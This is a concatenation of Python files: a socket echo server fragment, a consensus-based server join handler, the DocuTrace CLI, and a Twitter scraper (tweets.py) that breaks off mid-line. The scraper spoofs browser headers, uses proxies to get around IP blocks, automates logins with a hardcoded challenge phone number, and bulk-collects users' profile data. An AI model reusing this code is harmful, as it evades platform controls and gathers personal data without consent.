    conn.shutdown(socket.SHUT_RDWR)
    conn.close()


if __name__ == "__main__":
    main()
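
# --- Illustrative client (sketch, hypothetical host) ---
def echo_once(host="127.0.0.1", port=PORT, payload=b"hello"):
    """Send one payload to the echo server above and return the reply."""
    with socket.create_connection((host, port)) as conn:
        conn.sendall(payload)
        return conn.recv(BUFFER_SIZE)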
announcements.py
import threading
import base64

from nacl.signing import VerifyKey

from src.components.server.processing.client_requests import ClientRequestsProcessing
from src.core.election.election import Election
from src.protocol.consensus.suspect import GroupViewSuspect
from src.core.signatures.signatures import Signatures
from src.protocol.group_view.join import JoinMsg, JoinRequest, JoinResponse
from src.core.multicast.co_reliable_multicast import CausalOrderedReliableMulticast
from src.core.multicast.to_reliable_multicast import TotalOrderedReliableMulticast
from src.core.group_view.group_view import GroupView
from src.core.utils.configuration import Configuration
from src.core.utils.channel import Channel
from src.core.broadcast.broadcast_listener import BroadcastListener
from src.protocol.base import Message
from src.core.unicast.sender import UnicastSender
from src.core.consensus.phase_king import PhaseKing
from src.protocol.election.announcement import ElectionAnnouncement
from src.protocol.client.write.initial import *


class AnnouncementProcessing:
    def __init__(
        self,
        announcement_channel: Channel,
        consensus_channel: Channel,
        announcement_multicast: TotalOrderedReliableMulticast,
        client_processing: ClientRequestsProcessing,
        phase_king: PhaseKing,
        group_view: GroupView,
        configuration: Configuration,
    ):
        self._channel = announcement_channel
        self._consensus_channel = consensus_channel
        self._to_multicast = announcement_multicast
        self._client_processing = client_processing
        self._phase_king = phase_king
        self._group_view = group_view
        self._configuration = configuration
        self._signature = Signatures(group_view.sk, group_view.identifier)
        self._udp_sender = UnicastSender(self._configuration)
        self._election = Election(phase_king, group_view, configuration)

    def start(self):
        consumer_thread = threading.Thread(target=self.consumer)
        consumer_thread.start()

    def consumer(self):
        while True:
            data = self._channel.consume()
            self._process_request(data)

    def _process_request(self, data):
        msg = Message.initFromJSON(data)
        msg.decode()

        if "View: Join Message" == msg.header:
            self._process_join(data)
        elif "Election: Announcement" == msg.header:
            self._process_election()
        elif "Client: Join Message" == msg.header:
            self._process_client_init(data)

    def _process_join(self, data):
        join_msg = JoinMsg.initFromJSON(data)
        join_msg.decode()

        join_request = JoinRequest.initFromJSON(join_msg.request)
        join_request.decode()

        # run the phase-king algorithm on shortened data
        pk_string = base64.b64encode(join_request.pk.encode()).decode("ascii")
        shortened_data = "{}#{}#{}#{}".format(
            join_request.identifier, pk_string, join_request.ip_addr, join_request.port
        )
        shortened_data = self._phase_king.consensus(shortened_data)

        data = shortened_data.split("#")
        if len(data) != 4:
            return

        pk = VerifyKey(base64.b64decode(data[1]))

        # this allows the new server to send nacks and consume the storage of the TO-multicast
        self._group_view.add_server(data[0], pk, data[2], int(data[3]))

        # Verifying the signature requires that the new server is already in the
        # group view; if the signature is invalid, we simply suspend the server again.
        # Note that, due to the preceding phase-king round, all honest servers suspend
        # the server if at least one honest server does so.
        if not join_request.verify_signature(self._signature, self._group_view.pks):
            self._group_view.suspend_server(join_request.identifier)
            return

        # notify the new server that we halted further delivery and sending
        response = JoinResponse.initFromData("waiting")
        success = self._udp_sender.send_udp_sync(response, (data[2], int(data[3])))

        if not success:
            suspect_msg = GroupViewSuspect.initFromData(join_request.identifier, "JOIN: {}".format(join_request.identifier))
            suspect_msg.encode()
            self._to_multicast.send(suspect_msg, True)
            return

        # halt delivery and sending
        self._to_multicast.halt_multicast(join_request.identifier)

    def _process_election(self):
        consented_value = self._phase_king.consensus("election")
        if consented_value == "election":
            self._election.election()

    def _process_client_init(self, data):
        init_msg = TOInitMsg.initFromJSON(data)
        init_msg.decode()

        msg = InitMessage.initFromJSON(init_msg.request)
        msg.decode()

        pk_string = base64.b64encode(msg.pk.encode()).decode("ascii")
        consistent_pk = self._phase_king.consensus("client-init#" + pk_string)

        if "#" in consistent_pk:
            self._client_processing._posthook_client_init(init_msg.request, consistent_pk.split("#")[1])
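
# --- Illustrative round-trip of the shortened join payload (sketch) ---
# _process_join runs phase-king consensus over a '#'-joined string rather than
# the full signed request; honest servers then re-derive the four fields:
#
#   payload = "{}#{}#{}#{}".format(identifier, pk_b64, ip_addr, port)
#   identifier, pk_b64, ip_addr, port = payload.split("#")
#   pk = VerifyKey(base64.b64decode(pk_b64))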
main.py
#!/usr/bin/env python
import sys, argparse
from threading import Thread

from DocuTrace.Analysis.ComputeData import ComputeData
from DocuTrace.Analysis.DataCollector import DataCollector
from DocuTrace.Utils.Logging import logger
from DocuTrace.Utils.Validation import str2bool, validate_path, validate_task
from DocuTrace.Utils.Exceptions import InvalidPathError, InvalidTaskIDError
from DocuTrace.Utils.Tasks import tasks


def main():
    run(parse_args())


def run(args):
    try:
        verbosity = args.verbose
        logger.setLevel(verbosity)
        logger.info('Verbosity set to display info messages.')
        logger.debug('Verbosity set to display debug messages.')
        path = validate_path(args.filepath)
        data_collector = DataCollector(path)
        load = Thread(target=process_file, args=(data_collector,), daemon=True)
        load.start()
        task = validate_task(args.task_id)
        tasks(data_collector, load, task, args)
        print('Success!')

    except InvalidPathError as e:
        logger.exception(e)
        sys.exit(1)

    except InvalidTaskIDError as e:
        logger.exception(e)
        sys.exit(1)

    except Exception as e:
        logger.exception(e)
        sys.exit(1)


def parse_args():
    """Parse the args provided to this namespace

    usage: ``main.py [-h] [-u USER_UUID] [-d DOC_UUID] [-t TASK_ID] -f FILEPATH [-n [LIMIT_DATA]] [-v [VERBOSE]] [-e [EXIT_EARLY]]``

    **Command line interface for DocuTrace.**

    optional arguments:
        -h, --help            show this help message and exit

    Core parameters:
        -u USER_UUID, --user_uuid USER_UUID
                              Specifies the user uuid
        -d DOC_UUID, --doc_uuid DOC_UUID
                              Specifies the document uuid
        -t TASK_ID, --task_id TASK_ID
                              Specifies the task id
        -f FILEPATH, --filepath FILEPATH
                              Specifies the file name

    Secondary parameters:
        -n LIMIT_DATA, --limit_data LIMIT_DATA
                              Limits the number of displayed data points for tasks 2a, 2b, 3a, 3b, 4d, and 5.
        -v VERBOSE, --verbose VERBOSE
                              Set the verbosity level, 20 for INFO, 10 for DEBUG. Default is 30: WARN
        -e EXIT_EARLY, --exit_early EXIT_EARLY
                              Exit the program after running only the specified task.

    Returns:
        ArgumentParser: Parsed arguments
    """
    parser = argparse.ArgumentParser(description='Command line interface for DocuTrace.')
    args = parser.add_argument_group('Core parameters')
    args.add_argument('-u', '--user_uuid', help='Specifies the user uuid', required=False, default=None, type=str)
    args.add_argument('-d', '--doc_uuid', help='Specifies the document uuid', required=False, default=None, type=str)
    args.add_argument('-t', '--task_id', help='Specifies the task id', required=False, type=str)
    args.add_argument('-f', '--filepath', help='Specifies the file name', required=True, type=str)

    secondary_args = parser.add_argument_group('Secondary parameters')
    secondary_args.add_argument('-n', '--limit_data', help='Limits the number of displayed data points for tasks 2a, 2b, 3a, 3b, 4d, and 5.', type=int, required=False, default=None, const=20, nargs='?')
    secondary_args.add_argument('-v', '--verbose', type=int, required=False, default=30, nargs='?', const=20, help='Set the verbosity level, 20 for INFO, 10 for DEBUG. Default is 30: WARN')
    secondary_args.add_argument('-e', '--exit_early', type=str2bool, default=True, const=False, nargs='?', help='Continue the program after running only the specified task.')
    return parser.parse_args()


def process_file(data_collector):
    """Begin processing this file.
    """
    data_collector.gather_data()


if __name__ == "__main__":
    sys.exit(main() or 0)
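
# --- Illustrative invocation (hypothetical file path; task ids are those
#     listed in the help text above) ---
#   python main.py -f ./sample_data.json -t 5 -n 20 -v 20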
tweets.py
import csv  # To read & write Comma Separated Value files
import json  # To encode python objects to json
import os
import re  # For regular expressions
import sys
import time  # To manipulate time values
import warnings
from datetime import datetime  # To parse datetime types
from multiprocessing import Process, Queue  # Analogous to threading but uses processes & provides simple API for dummy subpackage
from multiprocessing.dummy import Lock
from multiprocessing.dummy import Pool as ThreadPool
from multiprocessing.dummy import Queue as ThreadQueue
from pprint import pprint  # To pretty print different data structures in python

import requests
from dateutil import parser as dateparser
from openpyxl import load_workbook

import settings
import sqlalchemy.exc
from pyquery import PyQuery
from sqlalchemy import *
from sqlalchemy import event, exc
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship, scoped_session, sessionmaker

time_wait = 0
flag1 = False

"""
REGEX => https://github.com/praritlamba/Mining-Twitter-Data-for-Sentiment-Analysis/blob/master/README.md
"""

emoticons_str = r"""
    (?:
        [:=;] # Eyes
        [oO\-]? # Nose (optional)
        [D\)\]\(\]/\\OpP] # Mouth
    )"""

regex_str = [
    emoticons_str,
    r'<[^>]+>',  # HTML tags
    r'(?:@[\w_]+)',  # @-mentions
    r"(?:\#+[\w_]+[\w\'_\-]*[\w_]+)",  # hash-tags
    r"(?:\$+[a-zA-Z]+[\w\'_\-]*[\w_]+)",  # cash-tags
    r'http[s]?://(?:[a-z]|[0-9]|[$-_@.&amp;+]|[!*\(\),]|(?:%[0-9a-f][0-9a-f]))+',  # URLs
    r'(?:(?:\d+,?)+(?:\.?\d+)?)',  # numbers
    r"(?:[a-z][a-z'\-_]+[a-z])",  # words with - and '
    r'(?:[\w_]+)',  # other words
    r'(?:\S)'  # anything else
]

tokens_re = re.compile(r'(' + '|'.join(regex_str) + ')', re.VERBOSE | re.IGNORECASE)
emoticon_re = re.compile(r'^' + emoticons_str + '$', re.VERBOSE | re.IGNORECASE)


class LoadingError(Exception):
    pass


# Get tweets
class Twit:
    def __init__(self):
        pass

    def json(self):
        return {'date': self.unixtime,
                'text': self.text,
                'screen_name': self.screen_name,
                'user_name': self.user_name,
                'user_id': self.user_id,
                'id': self.id,
                'retweets_count': self.retweets_count,
                'favorites_count': self.favorites_count,
                'permalink': self.permalink,
                'urls': self.urls,
                'mentions': self.mentions,
                'hashtags': self.hashtags,
                'is_retweet': self.is_retweet,
                'symbols': self.symbols,
                'is_protected': self.is_protected}

    def __repr__(self):
        return self.text


class Page(object):
    """Starts a requests session with twitter."""

    def __init__(self, proxy=None):
        self.pr = {
            'http': proxy,
            'https': proxy
        }  # for sending request using proxy, if twitter blocks your current ip
        self.timeout = 30  # timeout request if not getting response till 30 seconds
        self.ses = requests.Session()  # starting a session, so we could persist certain parameters across requests
        # using dict for sending some headers in our request
        self.ses.headers = {
            'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36',
            'Connection': 'keep-alive',
            'Cache-Control': 'max-age=0',
            'Accept-Encoding': 'gzip, deflate, sdch, br',
            # 'accept': 'application/json, text/javascript, */*; q=0.01',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'en-US;q=0.6,en;q=0.4',
            'x-compress': 'null',
            'Upgrade-Insecure-Requests': '1',
            # 'x-requested-with': 'XMLHttpRequest',
            # 'x-twitter-active-user': 'yes',
            'host': 'twitter.com'
        }

    def __del__(self):
        self.ses.close()

    def close(self):
        """Close the session.

        :return:
        """
        self.ses.close()

    def load(self, url, params=None, headers=None, important=True):
        """Returns request content after getting response from given url & params(GET), headers and timeout args."""
        error_count = 0  # counting request failures
        while True:
            try:
                resp = self.ses.get(url, proxies=self.pr, params=params, headers=headers, timeout=self.timeout)
            except requests.exceptions.RequestException as e:
                error_count += 1
                # print('Loading error', error_count, pr, e)
                if error_count < 3:
                    print('Loading error', error_count, url, self.pr, e)
                    time.sleep(60)
                    continue
                print('Error limit exceeded Loading error', url, self.pr, e)
                if important:
                    raise LoadingError
                else:
                    return None
            # showing different error messages depending upon different status_code(s);
            # if the request was important enough, raise LoadingError(Exception)
            if resp.status_code == requests.codes.ok:
                return resp.text
            elif resp.status_code == 404:
                print('Error 404', url, resp.text, resp.status_code)
                if important:
                    raise LoadingError
                else:
                    return None
            elif resp.status_code == 429:
                print('Rate limit. Sleep 3 min')
                time.sleep(3 * 60)
                continue
            elif resp.status_code == 503:
                # print('503 Error waiting 2 min', screen_name, proxy, url, resp.text, resp.status_code)
                error_count += 1
                if error_count > 5:
                    print('AWAM: Requests 503 error', url, self.pr)
                    if important:
                        raise LoadingError
                    else:
                        return None
                print(' Requests 503 error', error_count, url, self.pr)
                time.sleep(120)
                continue
            else:
                print('Error', url, resp.text, resp.status_code)
                error_count += 1
                print('Loading error', error_count)
                if error_count > 5:
                    print('Error limit exceeded Requests error ', url, self.pr, resp.status_code)
                    if important:
                        raise LoadingError
                    else:
                        return None
                print('Error waiting 1 min', url, resp.text, resp.status_code)
                time.sleep(60)
                continue


def twitter_login(page, login, password):
    """Function for twitter login."""
    resp = page.load('https://twitter.com/')
    # getting authenticity_token, just like csrf_token in django for verifying request
    res = re.findall('<input type="hidden" value="(.+?)" name="authenticity_token">', resp)
    token = res[0]
    params = {'session[username_or_email]': login,
              'session[password]': password,
              'remember_me': '1',
              'return_to_ssl': 'true',
              'scribe_log': '',
              'redirect_after_login': '/',
              'authenticity_token': token}
    url = 'https://twitter.com/sessions'
    while True:
        resp = page.ses.post(url, data=params, timeout=10)
        if resp.status_code == requests.codes.ok:
            if re.search('action="/logout" method="POST">', resp.text):
                print('Logged as', login)
                res = re.findall('<input type="hidden" value="(.+?)" name="authenticity_token', resp.text)
                token = res[0]
                return token
            elif re.search('Your account appears to have exhibited automated behavior that violates', resp.text):
                print('Your account appears to have exhibited automated behavior that violates')
                print('Pass a Google reCAPTCHA challenge. Verify your phone number')
                return False
            elif re.search('id="login-challenge-form"', resp.text):
                authenticity_token = re.findall('name="authenticity_token" value="(.+?)"/>', resp.text, re.S)[0]
                challenge_id = re.findall('name="challenge_id" value="(.+?)"/>', resp.text, re.S)[0]
                user_id = re.findall('name="user_id" value="(.+?)"/>', resp.text, re.S)[0]
                challenge_type = re.findall('name="challenge_type" value="(.+?)"/>', resp.text, re.S)[0]
                platform = re.findall('name="platform" value="(.+?)"/>', resp.text, re.S)[0]
                params = {
                    'authenticity_token': authenticity_token,
                    'challenge_id': challenge_id,
                    'user_id': user_id,
                    'challenge_type': challenge_type,
                    'platform': platform,
                    'redirect_after_login': '/',
                    'remember_me': 'true',
                    'challenge_response': '+1-812-679-7792'}
                url = 'https://twitter.com/account/login_challenge'
                print(challenge_type)
                continue
            elif re.search('You have initiated too many login verification requests', resp.text, re.S):
                print('You have initiated too many login verification requests')
                global time_wait
                print(time_wait)
                time_wait = time.time()
                raise LoadingError
            else:
                print('Not logged as', login)
                return False
            break
        else:
            print('Login Error', resp.status_code)
            return False

    # resp = page.ses.post('https://twitter.com/sessions', data=params, timeout=10)
    #
    # if re.search('action="/logout" method="POST">', resp.text):
    #     print('Logged as', login)
    #
    #     res = re.findall('<input type="hidden" value="(.+?)" name="authenticity_token', resp.text)
    #     token = res[0]
    #     return token
    # else:
    #     print('Not logged as', login)
    #     return None


def get_new_search(page, query, login=None, password=None, nativeretweets=False):
    """Searches for given query and returns a list of all tweets found."""
    user_name = query[0]
    query_string = query[1]
    data_begin = query[2]
    data_end = query[3]
    refreshCursor = ''

    h = {'x-requested-with': 'XMLHttpRequest',
         'x-twitter-active-user': 'yes',
         'accept': 'application/json, text/javascript, */*; q=0.01'}
    params = {}

    # if we want to scrape our own tweets, first login then start scraping
    if settings.PROFILE_SEARCH:
        refreshCursor = '999992735314882560'
        token = twitter_login(page, settings.TWITTER_USERNAME, settings.TWITTER_PASSWORD)
        if not token:
            print('UNABLE LOGIN')
            return False

    empty_count = 0
    date_range_change_count = 0
    while True:
        if settings.PROFILE_SEARCH:
            url = 'https://twitter.com/i/profiles/show/' + query_string + '/timeline/with_replies'
            params['include_available_features'] = '1'
            params['include_entities'] = '1'
            params['reset_error_state'] = 'false'
        else:
            url = 'https://twitter.com/i/search/timeline'
            params['include_available_features'] = '1'
            params['include_entities'] = '1'
            params['reset_error_state'] = 'false'
            params['vertical'] = 'default'
            params['src'] = 'typd'
            params['f'] = 'tweets'
            params['lang'] = 'en'
            params['q'] = ' ' + query_string + ' since:' + data_begin + ' until:' + data_end
        params['max_position'] = refreshCursor

        resp = page.load(url, params=params, headers=h)
        try:
            r = json.loads(resp)
        except Exception:
            print(resp)
            print('JSON error', url, page.pr)
            raise LoadingError
        if not r.get('inner', False):
            r['inner'] = r
        try:
            refreshCursor = r['inner']['min_position']
        except KeyError:
            print(resp)
            print('Key error', url, page.pr)
            raise LoadingError
        if not refreshCursor:
            break
        if not re.sub('[\n ]', '', r['inner']['items_html']):
            empty_count += 1
            if empty_count > 3:
                if data_current > data_begin:
                    print('Reduce date range')
                    date_range_change_count += 1
                    if date_range_change_count < 3:
                        data_end = data_current
                        empty_count = 0
                        continue
                break
            else:
                # print(r['inner']['new_latent_count'])
                print('Twitter server stopped. sleep 3 sec')
                time.sleep(3)
                continue
        empty_count = 0
        date_range_change_count = 0
        r = r['inner']['items_html']
        for tweet in cont(page, r, query_string):
            if tweet:
                data_current = re.sub(' \d+:\d+:\d+', '', str(tweet.date))
                yield tweet
    page.close()


# Content parser
def cont(page, r, query_string):
    r = re.sub('</span><span class="invisible">', '', r)
    try:
        tweets = PyQuery(r)('div.js-stream-tweet')
        # print(tweets.html())
    except Exception:
        print('no div.js-stream-tweet')
        return None
    for tweetHTML in tweets:
        # pprint(tweetHTML)
        tweet = Twit()
        # tweet.c = user_tweet_count
        tweetPQ = PyQuery(tweetHTML)
        # pprint(tweetPQ)
        tweet.time_zone = ''  # time_zone
        res = re.findall('twitter-cashtag pretty-link js-nav" dir="ltr"><s>\$</s><b>(?:<strong>)?(.+?)</', str(tweetPQ), re.M)
        tweet.symbols = []
        if res:
            res = list(set(res))
            for rt in res:
                if '$' + rt.upper() != query_string.upper():
                    tweet.symbols.append('$' + rt.upper())
        else:
            tweet.symbols = []
        # print(PyQuery(tweetHTML)('a.twitter-timeline-link'))
        tweet.urls = []
        flag = False
        for aa in PyQuery(tweetHTML)('a.twitter-timeline-link'):
            aaa = PyQuery(aa)
            if aaa.attr('data-expanded-url') and aaa.attr('data-expanded-url') != 'null' and aaa.attr(
                    'data-expanded-url') != 'None':
                tweet.urls.append(aaa.attr('data-expanded-url'))
                flag = True
                # print(tweetPQ("p.js-tweet-text").text())
            else:
                tweet.urls.append(aaa.attr('href'))
                # print(aaa.attr('href'),'https://'+aaa.text())
            aaa.remove()
            # print(tweetPQ("p.js-tweet-text").text())
        # if flag:
        #     raise LoadingError
        tweet.mentions_name = []
        tweet.mentions_id = []
        tweet.ment_s = []
        for aa in PyQuery(tweetHTML)('a.twitter-atreply'):
            aaa = PyQuery(aa)
            # mention={'screen_name':aaa.attr('href').replace('/',''),'id':aaa.attr('data-mentioned-user-id')}
            tweet.ment_s.append((aaa.attr('href').replace('/', ''), aaa.attr('data-mentioned-user-id')))
            tweet.mentions_name.append(aaa.attr('href').replace('/', ''))
            tweet.mentions_id.append(aaa.attr('data-mentioned-user-id'))
        usernameTweet = tweetPQ.attr("data-screen-name")
        t = tweetPQ("p.js-tweet-text").text().replace('# ', '#').replace('@ ', '@').replace('http:// ', 'http://').replace(
            'http://www. ', 'http://www.').replace('https://www. ', 'https://www.').replace('https:// ', 'https://')
        e = tweetPQ('img.Emoji')
        tweet.emoji = []
        for em in e:
            tweet.emoji.append(str(PyQuery(em).attr('aria-label').replace('Emoji: ', '')))
        # if DEBUG:
        #     print(tweet.emoji)
        txt = re.sub(r"\s+", " ", t)
        txt = re.sub('\$ (?P<s>[A-Z]{1,6}([._][A-Z]{1,2})?)', '$\g<s>', txt)
        if not re.search('<strong class="fullname">Tweet withheld</strong>', str(tweetPQ), re.M):
            try:
                retweets = int(tweetPQ("span.ProfileTweet-action--retweet span.ProfileTweet-actionCount").attr(
                    "data-tweet-stat-count").replace(",", ""))
            except AttributeError:
                print(str(tweetPQ))
                print('Attribute error in ProfileTweet-action--retweet')
                retweets = 0
            favorites = int(tweetPQ("span.ProfileTweet-action--favorite span.ProfileTweet-actionCount").attr(
                "data-tweet-stat-count").replace(",", ""))
            replyes = int(tweetPQ("span.ProfileTweet-action--reply span.ProfileTweet-actionCount").attr(
                "data-tweet-stat-count").replace(",", ""))
            dateSec = int(tweetPQ("small.time span.js-short-timestamp").attr("data-time"))
            if tweetPQ.attr('data-protected') == 'true':
                tweet.is_protected = True
            else:
                tweet.is_protected = False
            id = tweetPQ.attr("data-tweet-id")
            permalink = tweetPQ.attr("data-permalink-path")
            tweet.user_id = tweetPQ.attr('data-user-id')
            tweet.id = id
            tweet.permalink = 'https://twitter.com' + permalink
            tweet.screen_name = usernameTweet
            tweet.user_name = tweetPQ.attr('data-name')
            txt = re.sub('(?:https\://)|(?:http\://)', '', txt)
            # txt = re.sub('https\:\/\/', '', txt)
            # txt=re.sub('http\:\/\/','',txt)
            tweet.text = txt
            tweet.unixtime = dateSec
            tweet.date = datetime.fromtimestamp(dateSec)
            tweet.retweets_count = retweets
            tweet.favorites_count = favorites
            tweet.replyes_count = replyes
            # tweet.mentions = re.compile('(@\\w*)').findall(tweet.text)
            tweet.mentions = re.compile('(?:@[\w_]+)').findall(tweet.text)
            # tweet.hashtags = re.compile('(#\\w*)').findall(tweet.text)
            tweet.hashtags = re.compile('(?:\#+[\w_]+[\w\'_\-]*[\w_]+)').findall(tweet.text)
            tweet.geo = {}
            if tweetPQ.attr('data-retweeter'):
                tweet.is_retweet = True
                tweet.retweet_user_id = tweetPQ.attr('data-user-id')
                tweet.retweet_id = tweetPQ.attr('data-retweet-id')
            else:
                tweet.is_retweet = False
            tweet.lang = tweetPQ("p.js-tweet-text").attr("lang")
            tweet.is_reply = tweetPQ.attr("data-is-reply-to")
            tweet.data_conversation_id = tweetPQ.attr("data-conversation-id")
            if tweet.is_reply:
                tweet.is_reply = True
                tweet.data_conversation_id = tweetPQ.attr("data-conversation-id")
                tweet.is_reply_href = tweetPQ('a.js-user-profile-link').attr('href')
                tweet.is_reply_screen_name = tweet.is_reply_href.replace('/', '')
                tweet.is_reply_id = tweetPQ('a.js-user-profile-link').attr('data-user-id')
                if tweet.is_reply_id == tweet.user_id:
                    # reply to self
                    tweet.is_reply_username = tweet.user_name
                else:
                    tt = re.findall('<span class="username(.+?)</span>', str(tweetPQ('a.js-user-profile-link')), re.S | re.M)
                    try:
                        tweet.is_reply_username = re.findall('<b>(.+?)</b>', tt[0])[0]
                    except IndexError:
                        print('ERROR', tweetPQ('a.js-user-profile-link'))
                        print(tt, tweet.is_reply_id, tweet.permalink)
                        raise LoadingError
                # print(tweet.is_reply_username)
                # print(tweet.is_reply_href,tweet.is_reply_screen_name,tweet.is_reply_id,tweet.is_reply_username)
            else:
                tweet.is_reply = False
                # tweet.data_conversation_id = ''
                tweet.is_reply_href = ''
                tweet.is_reply_screen_name = ''
                tweet.is_reply_id = ''
                tweet.is_reply_username = ''
            tweet.likes = None
            tweet.user_tweet_count = None
            tweet.user_following_count = None
            tweet.user_followers_count = None
            tweet.user_created = None
            tweet.is_verified = None
            tweet.website = None
            tweet.user_location = None
            if settings.ISUSERPROFILE:
                r = get_user_profile(usernameTweet, page, tweet)
                if r:
                    tweet = r
                # tweet.user_created,tweet.user_followers_count,tweet.user_following_count,tweet.user_tweet_count=get_user_profile(tweet.screen_name,ses,pr)
            # geolocation
            tweet.location_name = None
            tweet.location_id = None
            if settings.ISLOCATION:
                url = 'https://twitter.com/' + tweet.screen_name + '/status/' + str(
                    tweet.data_conversation_id) + '?conversation_id=' + str(tweet.data_conversation_id)
                j = get_s(page, url, tweet.screen_name, important=False)
                if j:
                    tweet_status = PyQuery(j['page'])('a.js-geo-pivot-link')
                    if tweet_status:
                        # print(tweet_status.text(), tweet_status.attr('data-place-id'))
                        tweet.location_name = tweet_status.text()
                        tweet.location_id = tweet_status.attr('data-place-id') if tweet_status.attr('data-place-id') else ''
            yield tweet
    return None


# Get user profiles function
def get_user_profile(usernameTweet, page, tweet):
    url = 'https://twitter.com/' + usernameTweet
    j = get_s(page, url, '')  # query_string)
    if j:
        if j['init_data']:
            if j['init_data']['profile_user']:
                # print(json.dumps(j['init_data']['profile_user'], indent=4))
                # exit() .120
                tweet.likes = j['init_data']['profile_user']['favourites_count']
                tweet.user_tweet_count = j['init_data']['profile_user']['statuses_count']
                tweet.user_listed_count = j['init_data']['profile_user']['listed_count']
                tweet.user_description = j['init_data']['profile_user']['description']
                tweet.user_timezone = j['init_data']['profile_user']['time_zone']
                tweet.utc_offset = j['init_data']['profile_user']['utc_offset']
                tweet.user_following_count = j['init_data']['profile_user']['friends_count']
                tweet.user_followers_count = j['init_data']['profile_user']['followers_count']
                tweet.user_created = j['init_data']['profile_user']['created_at']
                tweet.is_verified = j['init_data']['profile_user']['verified']
                tweet.website = j['init_data']['profile_user']['url']
                tweet.username = j['init_data']['profile_user']['name']
                tweet.utc_offset = j['init_data']['profile_user']['utc_offset']
                if j['init_data']['profile_user'].get('location', False):
                    tweet.user_location = j['init_data']['profile_user']['location']
                else:
                    tweet.user_location = ''
                return tweet
    return None


def get_s(page, url, screen_name, important=True):
    h = {'X-Requested-With': 'XMLHttpRequest',
         'x-overlay-request': 'true',
         'x-previous-page-name': 'profile'}
    resp = page.load(url, headers=h, important=important)
    j = resp
    if resp:
        try:
            j = json.loads(resp)
        except Exception:
            print(url, resp)
            # print('AWAM: JSON popup', str(i), screen_name, url)
            # page.load returns text here, so only the raw payload can be reported
            print('Error limit exceeded ', resp)
            if important:
                raise LoadingError
            else:
                return None
    return j


def get_symbols(s):
    s = s.upper()
    res = re.findall('(\$[A-Z]{1,6}([._][A-Z]{1,2})?)', s, re.M)
    if res:
        r = list(map(lambda x: x[0], res))
        r = list(set(r))
        return r
    else:
        return []


# Full scrape function
def scra(query, i, proxy, lock, session):
    def tokenize(s):
        return tokens_re.findall(s)

    def preprocess(s, lowercase=False):
        tokens = tokenize(s)
        if lowercase:
            tokens = [token if emoticon_re.search(token) else token.lower() for token in tokens]
        return tokens

    q = query[4]
    fieldnames = ["QueryStartDate", "QueryEndDate", "Query", "DateOfActivity", "UserScreenName", "Keyword",
                  "Location", "Website", "DateJoined", "IsMention", "UserID", "TimeOfActivity", "Hashtags",
                  "Re_tweet", "NumberOfReplies", "NumberOfRe_tweets", "NumberOfFavorites", "Tweet", "tweet_id",
                  "tweet_url", "is_verified", "Urls", "UserFollowersCount", "UserFollowingCount",
                  "UserTweetsCount", "LikesCount", "CashtagSymbols", "user_location", "permno"]
    count = 0
    # for t in chain(get_retweets(query, proxy=proxy),
    #                get_retweets(query, proxy=proxy, nativeretweets=True)):
    ttm = time.time()
    tweet_list = []
    page = Page(proxy)
    # Loop through search results...
    for t in get_new_search(page, query):
        # pprint(t)
        # d = str(datetime.fromtimestamp(t.unixtime))
        # t1 = datetime.strptime(query[2], '%Y-%m-%d %H:%M:%S')
        # t2 = datetime.strptime(query[3], '%Y-%m-%d %H:%M:%S')
        # if int(t1.timestamp()) > int(t.unixtime):
        #     continue
        # if int(t.unixtime) > int(t2.timestamp()):
        #     continue
        data = {}
        data['permno'] = q
        data['user_location'] = t.user_location
        data['LikesCount'] = t.likes
        data['Website'] = t.website
        data['QueryStartDate'] = query[2]
        data['QueryEndDate'] = query[3]
        data['Query'] = query[1]
        data['Keyword'] = query[1]
        data['TimeOfActivity'] = time.strftime('%H:%M:%S', time.localtime(t.unixtime))
        data['DateOfActivity'] = time.strftime('%d/%m/%Y', time.localtime(t.unixtime))
        data['tweet_id'] = t.id
        data['tweet_url'] = t.permalink
        data['UserID'] = t.user_id
        data['UserScreenName'] = t.screen_name
        data['UserName'] = t.user_name
        data['TimeZone'] = t.time_zone
        data['UserTweetsCount'] = t.user_tweet_count
        data['UserFollowersCount'] = t.user_followers_count
        data['UserFollowingCount'] = t.user_following_count
        data['NumberOfFavorites'] = t.favorites_count
        data['NumberOfRe_tweets'] = t.retweets_count
        data['NumberOfReplies'] = t.replyes_count
        data['Re_tweet'] = t.is_retweet
        data['is_verified'] = t.is_verified
        # data['isProtected'] = t.is_protected
        data['isReply'] = t.is_reply
        data['ReplyTweetID'] = t.data_conversation_id
        data['ReplyUserId'] = t.is_reply_id
        # data['ReplyScreenName'] = t.is_reply_screen_name
        # data['Lang'] = t.lang
        data['Hashtags'] = ' '.join(t.hashtags)
        data['Urls'] = ', '.join(t.urls)
        data['CashtagSymbols'] = '\n'.join(t.symbols)
        # data['Mentions_id'] = '\n'.join(t.mentions_id)
        data['IsMention'] = ' '.join(t.mentions_name)
        data['Location'] = t.location_name
        # data['Location ID'] = t.location_id
        data['DateJoined'] = dateparser.parse(t.user_created) if t.user_created else None
        data['Tweet'] = t.text
        if t.utc_offset:
            if t.utc_offset / 3600 >= 0:
                data['TimeZoneUTC'] = 'UTC+' + str(int(t.utc_offset / 3600))
            else:
                data['TimeZoneUTC'] = 'UTC' + str(int(t.utc_offset / 3600))
        else:
            data['TimeZoneUTC'] = None
        tokens = preprocess(t.text)
        cashtags = [term for term in tokens if term.startswith('$') and len(term) > 1]
        hashtags = [term for term in tokens if term.startswith('#') and len(term) > 1]
        mentions = [term for term in tokens if term.startswith('@') and len(term) > 1]
        urls = [term for term in tokens if term.startswith('http') and len(term) > 4]
        tweet_list.append(data)
        # pprint(data)
        print(query, count, t.date)
        # print(data)
        if settings.ISUSERPROFILE:
            pass
            # dd = re.findall('\w+ (\w+) (\d+) \d+:\d+:\d+ \+\d+ (\d+)', data['DateJoined'])
            # try:
            #     date_joined = datetime.strptime(' '.join(dd[0]), '%b %d %Y')
            # except IndexError:
            #     print(data['DateJoined'], dd)
            #     exit()
        else:
            date_joined = None
            t.user_listed_count = None
            t.username = t.user_name
            t.user_timezone = None
            t.user_description = None
            data['Website'] = None
            data['is_verified'] = None
        if session.query(Tweet).filter_by(tweet_id=data['tweet_id']).first():
            continue
        user = session.query(User).filter_by(user_id=data['UserID']).first()
        if not user:
            user_count = UserCount(follower=data['UserFollowersCount'], following=data['UserFollowingCount'],
